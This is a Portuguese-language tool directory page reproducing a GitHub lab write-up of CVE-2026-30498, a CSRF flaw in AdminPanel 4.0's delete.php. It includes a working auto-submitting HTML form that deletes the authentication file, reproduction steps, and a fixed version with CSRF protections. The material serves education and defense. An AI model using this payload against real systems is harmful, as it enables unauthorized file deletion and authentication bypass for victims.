Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-30498 — Demonstração educacional de vulnerabilidade CSRF com um ambiente de laboratório controlado, incluindo uma prova de conceito de exploração e uma versão corrigida com proteções CSRF adequadas. | Kitploit
Ferramentas/GitHubGitHub/mehdi-ben-hamou/cve-2026-30498
Análise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubmehdi-ben-hamou/cve-2026-30498

CVE-2026-30498

Demonstração educacional de vulnerabilidade CSRF com um ambiente de laboratório controlado, incluindo uma prova de conceito de exploração e uma versão corrigida com proteções CSRF adequadas.

Ver Repositório
11há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-30498 – Vulnerabilidade CSRF (AdminPanel 4.0)


Visão Geral

ID CVE: CVE-2026-30498 (Reservado pela MITRE)
Descobridor: Mehdi Ben Hamou

Existe uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no endpoint delete.php do AdminPanel 4.0.

Esta vulnerabilidade permite que um atacante acione ações sensíveis (exclusão de arquivos) em nome de um usuário autenticado sem o seu consentimento.


Detalhes Técnicos

A vulnerabilidade é causada pela ausência de proteções CSRF:

  • Sem validação de token CSRF
  • Sem validação de Origin / Referer
  • Ação sensível exposta via requisição GET
  • Sem verificação da intenção do usuário

O endpoint vulnerável processa requisições diretamente com base na sessão do usuário, sem validar a origem da requisição.


Impacto

A exploração bem-sucedida leva a:

  • Exclusão de verifyPanel.php
  • Bypass de autenticação
  • A aplicação entra em modo de configuração
  • Possível reinicialização completa do sistema

  • Versão Afetada

    • AdminPanel 4.0 e anteriores (projeto arquivado)

    Cenário de Ataque

    Um atacante hospeda uma página web maliciosa que envia uma requisição forjada:

    root@kitploit:~
    http://localhost:8080/delete.php?file=verifyPanel.php
    

    Quando uma vítima (usuário autenticado) visita esta página, o navegador inclui automaticamente os cookies de sessão, e a requisição é executada.


    Prova de Conceito (PoC)

    Página Maliciosa (Atacante)

    root@kitploit:~
    <form id="csrfForm" action="http://localhost:8080/delete.php" method="GET">
      <input type="hidden" name="file" value="verifyPanel.php">
    </form>
    <script>
      document.getElementById("csrfForm").submit();
    </script>
    

    Esta requisição é enviada automaticamente com o cookie de sessão da vítima.


    Passos para Reproduzir

    1. Inicie o servidor da vítima:
    root@kitploit:~
    php -S localhost:8080
    
    1. Acesse a página de login:
    root@kitploit:~
    http://localhost:8080
    
    1. Faça login com:
    root@kitploit:~
    admin / admin123
    
    1. Abra a página do atacante:
    root@kitploit:~
    http://localhost:8081/evil.html
    
    1. Lance o ataque CSRF
    2. Retorne ao painel:
    root@kitploit:~
    /panel/dashboard.php
    

    O Que Acontece Internamente

    1. A vítima faz login → cookie de sessão criado
    2. A página do atacante envia requisição forjada
    3. O navegador anexa automaticamente o cookie
    4. O servidor executa a exclusão sem verificação
    5. O sistema detecta o arquivo de autenticação ausente
    6. A aplicação entra em modo de configuração

    Ambiente de Laboratório (Simulação Pedagógica)

    Este repositório inclui um ambiente de laboratório controlado para reproduzir a vulnerabilidade com segurança.

    Importante: Este laboratório é uma simulação e não representa o código-fonte original exato do AdminPanel.

    Redefinir o Laboratório

    Para redefinir o ambiente:

    root@kitploit:~
    /reset.php
    

    Versão Corrigida (Mitigação)

    Uma versão segura é implementada em:

    root@kitploit:~
    delete_fixed.php
    

    Proteções adicionadas:

    • ✅ Validação de token CSRF
    • ✅ Apenas método POST
    • ✅ Validação de Origin / Referer
    • ✅ Validação de sessão

    Por Que a Correção Funciona

    • O atacante não consegue acessar o token CSRF (Política de Mesma Origem)
    • Requisições forjadas não possuem token válido → rejeitadas
    • Requisições de origens cruzadas bloqueadas via verificação de Origin

    Estrutura do Projeto

    root@kitploit:~
    victim/
    ├── index.php
    ├── delete.php
    ├── delete_fixed.php
    ├── reset.php
    └── panel/
        └── dashboard.php
    
    attacker/
    └── evil.html
    

    Aviso Legal

    Este projeto destina-se apenas a fins educacionais e de pesquisa.
    Não utilize esta vulnerabilidade em sistemas sem autorização adequada.

    Baixar ferramenta